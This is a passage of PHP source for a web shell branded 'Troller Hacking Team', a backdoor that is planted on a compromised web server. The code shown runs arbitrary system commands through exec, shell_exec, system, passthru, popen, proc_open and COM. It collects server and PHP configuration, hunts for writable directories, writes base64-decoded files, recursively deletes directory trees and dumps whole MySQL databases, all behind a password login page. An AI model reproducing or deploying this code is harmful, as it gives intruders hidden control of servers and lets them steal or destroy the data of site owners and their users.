1515 $stdout = $exec->StdOut();
1516 $stroutput = $stdout->ReadAll();
1517 echo $stroutput;
1518 } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
1519 $descriptorspec = array(
1520 0 => array('pipe', 'r'),
1521 1 => array('pipe', 'w'),
1522 2 => array('pipe', 'w')
1523 );
1524 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1525 if (is_resource($process)) {
1526 fwrite($pipes[0], $command."\r\n");
1527 fwrite($pipes[0], "exit\r\n");
1528 fclose($pipes[0]);
1529 while (!feof($pipes[1])) {
1530 echo fgets($pipes[1], 1024);
1531 }
1532 fclose($pipes[1]);
1533 while (!feof($pipes[2])) {
1534 echo fgets($pipes[2], 1024);
1535 }
1536 fclose($pipes[2]);
1537 proc_close($process);
1538 }
1539 } else {
1540 echo(execute($command));
1541 }
1542 p('</pre>');
1543 }
1544}//end shell
1545
1546elseif ($action == 'phpenv') {
1547 $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1548 $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1549 !$dis_func && $dis_func = 'No';
1550 $info = array(
1551 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
1552 2 => array('Server Domain',$_SERVER['SERVER_NAME']),
1553 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
1554 4 => array('Server OS',PHP_OS),
1555 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
1556 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
1557 7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
1558 8 => array('PHP run mode',strtoupper(php_sapi_name())),
1559 9 => array('The file path',__FILE__),
1560
1561 10 => array('PHP Version',PHP_VERSION),
1562 11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
1563 12 => array('Safe Mode',getcfg('safe_mode')),
1564 13 => array('Administrator',$adminmail),
1565 14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
1566 15 => array('enable_dl',getcfg('enable_dl')),
1567 16 => array('display_errors',getcfg('display_errors')),
1568 17 => array('register_globals',getcfg('register_globals')),
1569 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
1570 19 => array('memory_limit',getcfg('memory_limit')),
1571 20 => array('post_max_size',getcfg('post_max_size')),
1572 21 => array('upload_max_filesize',$upsize),
1573 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
1574 23 => array('disable_functions',$dis_func),
1575 );
1576
1577 if($phpvarname) {
1578 m($phpvarname .' : '.getcfg($phpvarname));
1579 }
1580
1581 formhead(array('title'=>'Server environment'));
1582 makehide('action','phpenv');
1583 makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
1584 formfooter();
1585
1586 $hp = array(0=> 'Server', 1=> 'PHP');
1587 for($a=0;$a<2;$a++) {
1588 p('<h2>'.$hp[$a].' »</h2>');
1589 p('<ul class="info">');
1590 if ($a==0) {
1591 for($i=1;$i<=9;$i++) {
1592 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1593 }
1594 } elseif ($a == 1) {
1595 for($i=10;$i<=23;$i++) {
1596 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1597 }
1598 }
1599 p('</ul>');
1600 }
1601}//end phpenv
1602
1603else {
1604 m('Undefined Action');
1605}
1606
1607?>
1608</td></tr></table>
1609<div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
1610 <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
1611 Copyright (C) 2015-2016 <B></B> - Design by <a href=http://google.com.vn target=_blank><B>Joker - THT </B></a> - <B>- We Are Not Hacker,We Are Troller</B> All Rights Reserved.
1612</div>
1613</body>
1614</html>
1615
1616<?php
1617
1618/*======================================================
1619Show info shell
1620======================================================*/
1621
1622function m($msg) {
1623 echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
1624 echo $msg;
1625 echo '</div>';
1626}
1627function scookie($key, $value, $life = 0, $prefix = 1) {
1628 global $admin, $timestamp, $_SERVER;
1629 $key = ($prefix ? $admin['cookiepre'] : '').$key;
1630 $life = $life ? $life : $admin['cookielife'];
1631 $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1632 setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
1633}
1634function multi($num, $perpage, $curpage, $tablename) {
1635 $multipage = '';
1636 if($num > $perpage) {
1637 $page = 10;
1638 $offset = 5;
1639 $pages = @ceil($num / $perpage);
1640 if($page > $pages) {
1641 $from = 1;
1642 $to = $pages;
1643 } else {
1644 $from = $curpage - $offset;
1645 $to = $curpage + $page - $offset - 1;
1646 if($from < 1) {
1647 $to = $curpage + 1 - $from;
1648 $from = 1;
1649 if(($to - $from) < $page && ($to - $from) < $pages) {
1650 $to = $page;
1651 }
1652 } elseif($to > $pages) {
1653 $from = $curpage - $pages + $to;
1654 $to = $pages;
1655 if(($to - $from) < $page && ($to - $from) < $pages) {
1656 $from = $pages - $page + 1;
1657 }
1658 }
1659 }
1660 $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
1661 for($i = $from; $i <= $to; $i++) {
1662 $multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
1663 }
1664 $multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
1665 $multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
1666 }
1667 return $multipage;
1668}
1669// Login page
1670function loginpage() {
1671?>
1672<html>
1673<head>
1674
1675<center><img src=https://media1.giphy.com/media/8oh42nM14t50Q/200.gif height=250 border=0></center>
1676<body background=http://d22zlbw5ff7yk5.cloudfront.net/images/cm-50293-0511d94f8acb45.gif></body>
1677
1678 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1679<title>Troller Hacking Team - Shell </title>
1680<style type="text/css">
1681A:link {text-decoration: none; color: green }
1682A:visited {text-decoration: none;color:red}
1683A:active {text-decoration: none}
1684A:hover {text-decoration: underline; color: green;}
1685input, textarea, button
1686{
1687 font-size: 11pt;
1688 color: #FFFFFF;
1689 font-family: verdana, sans-serif;
1690 background-color: #000000;
1691 border-left: 2px dashed #8B0000;
1692 border-top: 2px dashed #8B0000;
1693 border-right: 2px dashed #8B0000;
1694 border-bottom: 2px dashed #8B0000;
1695}
1696
1697</style>
1698
1699 <BR><BR>
1700<div align=center >
1701
1702<div>
1703<font color=gray>
1704<br /><br /><br /><br /><br />
1705
1706<form method="POST" action="">
1707 <span style="font:20pt tahoma;"> </span><input name="password" type="password" size="30">
1708 <input type="hidden" name="doing" value="login">
1709 <input type="submit" value="Login">
1710 </form>
1711<BR>
1712<?php
1713echo "".$err_mess."";
1714?>
1715
1716 <B><font color=red>
1717
1718
1719
1720
1721
1722
1723</div>
1724
1725
1726 </fieldset>
1727
1728
1729
1730</head>
1731</html>
1732
1733
1734<?php
1735 exit;
1736
1737}//end loginpage()
1738
1739function execute($cfe) {
1740 $res = '';
1741 if ($cfe) {
1742 if(function_exists('exec')) {
1743 @exec($cfe,$res);
1744 $res = join("\n",$res);
1745 } elseif(function_exists('shell_exec')) {
1746 $res = @shell_exec($cfe);
1747 } elseif(function_exists('system')) {
1748 @ob_start();
1749 @system($cfe);
1750 $res = @ob_get_contents();
1751 @ob_end_clean();
1752 } elseif(function_exists('passthru')) {
1753 @ob_start();
1754 @passthru($cfe);
1755 $res = @ob_get_contents();
1756 @ob_end_clean();
1757 } elseif(@is_resource($f = @popen($cfe,"r"))) {
1758 $res = '';
1759 while(!@feof($f)) {
1760 $res .= @fread($f,1024);
1761 }
1762 @pclose($f);
1763 }
1764 }
1765 return $res;
1766}
1767function which($pr) {
1768 $path = execute("which $pr");
1769 return ($path ? $path : $pr);
1770}
1771
1772function cf($fname,$text){
1773 if($fp=@fopen($fname,'w')) {
1774 @fputs($fp,@base64_decode($text));
1775 @fclose($fp);
1776 }
1777}
1778
1779// Debug
1780function debuginfo() {
1781 global $starttime;
1782 $mtime = explode(' ', microtime());
1783 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1784 echo 'Processed in '.$totaltime.' second(s)';
1785}
1786
1787// Function connect database
1788function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
1789 if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
1790 p('<h2>Can not connect to MySQL server</h2>');
1791 exit;
1792 }
1793 if($link && $dbname) {
1794 if (!@mysql_select_db($dbname, $link)) {
1795 p('<h2>Database selected has error</h2>');
1796 exit;
1797 }
1798 }
1799 if($link && mysql_get_server_info() > '4.1') {
1800 if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
1801 q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
1802 }
1803 }
1804 return $link;
1805}
1806
1807// Array strip
1808function s_array(&$array) {
1809 if (is_array($array)) {
1810 foreach ($array as $k => $v) {
1811 $array[$k] = s_array($v);
1812 }
1813 } else if (is_string($array)) {
1814 $array = stripslashes($array);
1815 }
1816 return $array;
1817}
1818
1819// HTML Strip
1820function html_clean($content) {
1821 $content = htmlspecialchars($content);
1822 $content = str_replace("\n", "<br />", $content);
1823 $content = str_replace(" ", " ", $content);
1824 $content = str_replace("\t", " ", $content);
1825 return $content;
1826}
1827
1828// Chmod
1829function getChmod($filepath){
1830 return substr(base_convert(@fileperms($filepath),10,8),-4);
1831}
1832
1833function getPerms($filepath) {
1834 $mode = @fileperms($filepath);
1835 if (($mode & 0xC000) === 0xC000) {$type = 's';}
1836 elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
1837 elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
1838 elseif (($mode & 0x8000) === 0x8000) {$type = '-';}
1839 elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
1840 elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
1841 elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
1842 else {$type = '?';}
1843
1844 $owner['read'] = ($mode & 00400) ? 'r' : '-';
1845 $owner['write'] = ($mode & 00200) ? 'w' : '-';
1846 $owner['execute'] = ($mode & 00100) ? 'x' : '-';
1847 $group['read'] = ($mode & 00040) ? 'r' : '-';
1848 $group['write'] = ($mode & 00020) ? 'w' : '-';
1849 $group['execute'] = ($mode & 00010) ? 'x' : '-';
1850 $world['read'] = ($mode & 00004) ? 'r' : '-';
1851 $world['write'] = ($mode & 00002) ? 'w' : '-';
1852 $world['execute'] = ($mode & 00001) ? 'x' : '-';
1853
1854 if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
1855 if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
1856 if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
1857
1858 return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
1859}
1860
1861function getUser($filepath) {
1862 if (function_exists('posix_getpwuid')) {
1863 $array = @posix_getpwuid(@fileowner($filepath));
1864 if ($array && is_array($array)) {
1865 return ' / <a href="#" title="User: '.$array['name'].'
Passwd: '.$array['passwd'].'
Uid: '.$array['uid'].'
gid: '.$array['gid'].'
Gecos: '.$array['gecos'].'
Dir: '.$array['dir'].'
Shell: '.$array['shell'].'">'.$array['name'].'</a>';
1866 }
1867 }
1868 return '';
1869}
1870
1871// Delete dir
1872function deltree($deldir) {
1873 $mydir=@dir($deldir);
1874 while($file=$mydir->read()) {
1875 if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {
1876 @chmod($deldir.'/'.$file,0777);
1877 deltree($deldir.'/'.$file);
1878 }
1879 if (is_file($deldir.'/'.$file)) {
1880 @chmod($deldir.'/'.$file,0777);
1881 @unlink($deldir.'/'.$file);
1882 }
1883 }
1884 $mydir->close();
1885 @chmod($deldir,0777);
1886 return @rmdir($deldir) ? 1 : 0;
1887}
1888
1889// Background
1890function bg() {
1891 global $bgc;
1892 return ($bgc++%2==0) ? 'alt1' : 'alt2';
1893}
1894
1895// Get path
1896function getPath($scriptpath, $nowpath) {
1897 if ($nowpath == '.') {
1898 $nowpath = $scriptpath;
1899 }
1900 $nowpath = str_replace('\\', '/', $nowpath);
1901 $nowpath = str_replace('//', '/', $nowpath);
1902 if (substr($nowpath, -1) != '/') {
1903 $nowpath = $nowpath.'/';
1904 }
1905 return $nowpath;
1906}
1907
1908// Get up path
1909function getUpPath($nowpath) {
1910 $pathdb = explode('/', $nowpath);
1911 $num = count($pathdb);
1912 if ($num > 2) {
1913 unset($pathdb[$num-1],$pathdb[$num-2]);
1914 }
1915 $uppath = implode('/', $pathdb).'/';
1916 $uppath = str_replace('//', '/', $uppath);
1917 return $uppath;
1918}
1919
1920// Config
1921function getcfg($varname) {
1922 $result = get_cfg_var($varname);
1923 if ($result == 0) {
1924 return 'No';
1925 } elseif ($result == 1) {
1926 return 'Yes';
1927 } else {
1928 return $result;
1929 }
1930}
1931
1932// Function name
1933function getfun($funName) {
1934 return (false !== function_exists($funName)) ? 'Yes' : 'No';
1935}
1936
1937function GetList($dir){
1938 global $dirdata,$j,$nowpath;
1939 !$j && $j=1;
1940 if ($dh = opendir($dir)) {
1941 while ($file = readdir($dh)) {
1942 $f=str_replace('//','/',$dir.'/'.$file);
1943 if($file!='.' && $file!='..' && is_dir($f)){
1944 if (is_writable($f)) {
1945 $dirdata[$j]['filename']=str_replace($nowpath,'',$f);
1946 $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1947 $dirdata[$j]['dirchmod']=getChmod($f);
1948 $dirdata[$j]['dirperm']=getPerms($f);
1949 $dirdata[$j]['dirlink']=ue($dir);
1950 $dirdata[$j]['server_link']=$f;
1951 $dirdata[$j]['client_link']=ue($f);
1952 $j++;
1953 }
1954 GetList($f);
1955 }
1956 }
1957 closedir($dh);
1958 clearstatcache();
1959 return $dirdata;
1960 } else {
1961 return array();
1962 }
1963}
1964
1965function qy($sql) {
1966 //echo $sql.'<br>';
1967 $res = $error = '';
1968 if(!$res = @mysql_query($sql)) {
1969 return 0;
1970 } else if(is_resource($res)) {
1971 return 1;
1972 } else {
1973 return 2;
1974 }
1975 return 0;
1976}
1977
1978function q($sql) {
1979 return @mysql_query($sql);
1980}
1981
1982function fr($qy){
1983 mysql_free_result($qy);
1984}
1985
1986function sizecount($size) {
1987 if($size > 1073741824) {
1988 $size = round($size / 1073741824 * 100) / 100 . ' G';
1989 } elseif($size > 1048576) {
1990 $size = round($size / 1048576 * 100) / 100 . ' M';
1991 } elseif($size > 1024) {
1992 $size = round($size / 1024 * 100) / 100 . ' K';
1993 } else {
1994 $size = $size . ' B';
1995 }
1996 return $size;
1997}
1998
1999// Zip
2000class PHPZip{
2001 var $out='';
2002 function PHPZip($dir) {
2003 if (@function_exists('gzcompress')) {
2004 $curdir = getcwd();
2005 if (is_array($dir)) $filelist = $dir;
2006 else{
2007 $filelist=$this -> GetFileList($dir);//File list
2008 foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
2009 }
2010 if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
2011 else chdir($curdir);
2012 if (count($filelist)>0){
2013 foreach($filelist as $filename){
2014 if (is_file($filename)){
2015 $fd = fopen ($filename, 'r');
2016 $content = @fread ($fd, filesize($filename));
2017 fclose ($fd);
2018 if (is_array($dir)) $filename = basename($filename);
2019 $this -> addFile($content, $filename);
2020 }
2021 }
2022 $this->out = $this -> file();
2023 chdir($curdir);
2024 }
2025 return 1;
2026 }
2027 else return 0;
2028 }
2029
2030 // Show file list
2031 function GetFileList($dir){
2032 static $a;
2033 if (is_dir($dir)) {
2034 if ($dh = opendir($dir)) {
2035 while ($file = readdir($dh)) {
2036 if($file!='.' && $file!='..'){
2037 $f=$dir .'/'. $file;
2038 if(is_dir($f)) $this->GetFileList($f);
2039 $a[]=$f;
2040 }
2041 }
2042 closedir($dh);
2043 }
2044 }
2045 return $a;
2046 }
2047
2048 var $datasec = array();
2049 var $ctrl_dir = array();
2050 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
2051 var $old_offset = 0;
2052
2053 function unix2DosTime($unixtime = 0) {
2054 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
2055 if ($timearray['year'] < 1980) {
2056 $timearray['year'] = 1980;
2057 $timearray['mon'] = 1;
2058 $timearray['mday'] = 1;
2059 $timearray['hours'] = 0;
2060 $timearray['minutes'] = 0;
2061 $timearray['seconds'] = 0;
2062 } // end if
2063 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
2064 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
2065 }
2066
2067 function addFile($data, $name, $time = 0) {
2068 $name = str_replace('\\', '/', $name);
2069
2070 $dtime = dechex($this->unix2DosTime($time));
2071 $hexdtime = '\x' . $dtime[6] . $dtime[7]
2072 . '\x' . $dtime[4] . $dtime[5]
2073 . '\x' . $dtime[2] . $dtime[3]
2074 . '\x' . $dtime[0] . $dtime[1];
2075 eval('$hexdtime = "' . $hexdtime . '";');
2076 $fr = "\x50\x4b\x03\x04";
2077 $fr .= "\x14\x00";
2078 $fr .= "\x00\x00";
2079 $fr .= "\x08\x00";
2080 $fr .= $hexdtime;
2081
2082 $unc_len = strlen($data);
2083 $crc = crc32($data);
2084 $zdata = gzcompress($data);
2085 $c_len = strlen($zdata);
2086 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
2087 $fr .= pack('V', $crc);
2088 $fr .= pack('V', $c_len);
2089 $fr .= pack('V', $unc_len);
2090 $fr .= pack('v', strlen($name));
2091 $fr .= pack('v', 0);
2092 $fr .= $name;
2093 $fr .= $zdata;
2094 $fr .= pack('V', $crc);
2095 $fr .= pack('V', $c_len);
2096 $fr .= pack('V', $unc_len);
2097
2098 $this -> datasec[] = $fr;
2099 $new_offset = strlen(implode('', $this->datasec));
2100
2101 $cdrec = "\x50\x4b\x01\x02";
2102 $cdrec .= "\x00\x00";
2103 $cdrec .= "\x14\x00";
2104 $cdrec .= "\x00\x00";
2105 $cdrec .= "\x08\x00";
2106 $cdrec .= $hexdtime;
2107 $cdrec .= pack('V', $crc);
2108 $cdrec .= pack('V', $c_len);
2109 $cdrec .= pack('V', $unc_len);
2110 $cdrec .= pack('v', strlen($name) );
2111 $cdrec .= pack('v', 0 );
2112 $cdrec .= pack('v', 0 );
2113 $cdrec .= pack('v', 0 );
2114 $cdrec .= pack('v', 0 );
2115 $cdrec .= pack('V', 32 );
2116 $cdrec .= pack('V', $this -> old_offset );
2117 $this -> old_offset = $new_offset;
2118 $cdrec .= $name;
2119
2120 $this -> ctrl_dir[] = $cdrec;
2121 }
2122
2123 function file() {
2124 $data = implode('', $this -> datasec);
2125 $ctrldir = implode('', $this -> ctrl_dir);
2126 return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
2127 }
2128}
2129
2130// Dump mysql
2131function sqldumptable($table, $fp=0) {
2132 $tabledump = "DROP TABLE IF EXISTS $table;\n";
2133 $tabledump .= "CREATE TABLE $table (\n";
2134
2135 $firstfield=1;
2136
2137 $fields = q("SHOW FIELDS FROM $table");
2138 while ($field = mysql_fetch_array($fields)) {
2139 if (!$firstfield) {
2140 $tabledump .= ",\n";
2141 } else {
2142 $firstfield=0;
2143 }
2144 $tabledump .= " $field[Field] $field[Type]";
2145 if (!empty($field["Default"])) {
2146 $tabledump .= " DEFAULT '$field[Default]'";
2147 }
2148 if ($field['Null'] != "YES") {
2149 $tabledump .= " NOT NULL";
2150 }
2151 if ($field['Extra'] != "") {
2152 $tabledump .= " $field[Extra]";
2153 }
2154 }
2155 fr($fields);
2156
2157 $keys = q("SHOW KEYS FROM $table");
2158 while ($key = mysql_fetch_array($keys)) {
2159 $kname=$key['Key_name'];
2160 if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
2161 $kname="UNIQUE|$kname";
2162 }
2163 if(!is_array($index[$kname])) {
2164 $index[$kname] = array();
2165 }
2166 $index[$kname][] = $key['Column_name'];
2167 }
2168 fr($keys);
2169
2170 while(list($kname, $columns) = @each($index)) {
2171 $tabledump .= ",\n";
2172 $colnames=implode($columns,",");
2173
2174 if ($kname == "PRIMARY") {
2175 $tabledump .= " PRIMARY KEY ($colnames)";
2176 } else {
2177 if (substr($kname,0,6) == "UNIQUE") {
2178 $kname=substr($kname,7);
2179 }
2180 $tabledump .= " KEY $kname ($colnames)";
2181 }
2182 }
2183
2184 $tabledump .= "\n);\n\n";
2185 if ($fp) {
2186 fwrite($fp,$tabledump);
2187 } else {
2188 echo $tabledump;
2189 }
2190
2191 $rows = q("SELECT * FROM $table");
2192 $numfields = mysql_num_fields($rows);
2193 while ($row = mysql_fetch_array($rows)) {
2194 $tabledump = "INSERT INTO $table VALUES(";
2195
2196 $fieldcounter=-1;
2197 $firstfield=1;
2198 while (++$fieldcounter<$numfields) {
2199 if (!$firstfield) {
2200 $tabledump.=", ";
2201 } else {
2202 $firstfield=0;
2203 }
2204
2205 if (!isset($row[$fieldcounter])) {
2206 $tabledump .= "NULL";
2207 } else {
2208 $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
2209 }
2210 }
2211
2212 $tabledump .= ");\n";
2213
2214 if ($fp) {
2215 fwrite($fp,$tabledump);
2216 } else {
2217 echo $tabledump;
2218 }
2219 }
2220 fr($rows);
2221 if ($fp) {
2222 fwrite($fp,"\n");
2223 } else {
2224 echo "\n";
2225 }
2226}
2227
2228function ue($str){
2229 return urlencode($str);
2230}
2231
2232function p($str){
2233 echo $str."\n";
2234}
2235
2236function tbhead() {
2237 p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
2238}
2239function tbfoot(){
2240 p('</table>');
2241}
2242
2243function makehide($name,$value=''){
2244 p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
2245}
2246
2247function makeinput($arg = array()){
2248 $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
2249 $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
2250 !$arg['type'] && $arg['type'] = 'text';
2251 $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
2252 $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
2253 if ($arg['newline']) {
2254 p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
2255 } else {
2256 p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
2257 }
2258}
2259
2260function makeselect($arg = array()){
2261 if ($arg['onchange']) {
2262 $onchange = 'onchange="'.$arg['onchange'].'"';
2263 }
2264 $arg['title'] = $arg['title'] ? $arg['title'] : '';
2265 if ($arg['newline']) p('<p>');
2266 p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
2267 if (is_array($arg['option'])) {
2268 foreach ($arg['option'] as $key=>$value) {
2269 if ($arg['selected']==$key) {
2270 p("<option value=\"$key\" selected>$value</option>");
2271 } else {
2272 p("<option value=\"$key\">$value</option>");
2273 }
2274 }
2275 }
2276 p("</select>");
2277 if ($arg['newline']) p('</p>');
2278}
2279function formhead($arg = array()) {
2280 !$arg['method'] && $arg['method'] = 'post';
2281 !$arg['action'] && $arg['action'] = $self;
2282 $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
2283 !$arg['name'] && $arg['name'] = 'form1';
2284 p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
2285 if ($arg['title']) {
2286 p('<h2>'.$arg['title'].' »</h2>');
2287 }
2288}
2289
2290function maketext($arg = array()){
2291 !$arg['cols'] && $arg['cols'] = 100;
2292 !$arg['rows'] && $arg['rows'] = 25;
2293 $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
2294 p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
2295}
2296
2297function formfooter($name = ''){
2298 !$name && $name = 'submit';
2299 p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="Submit"></p>');
2300 p('</form>');
2301}
2302
2303function formfoot(){
2304 p('</form>');
2305}
2306
2307// Exit
2308function pr($a) {
2309 echo '<pre>';
2310 print_r($a);
2311 echo '</pre>';
2312}
2313?>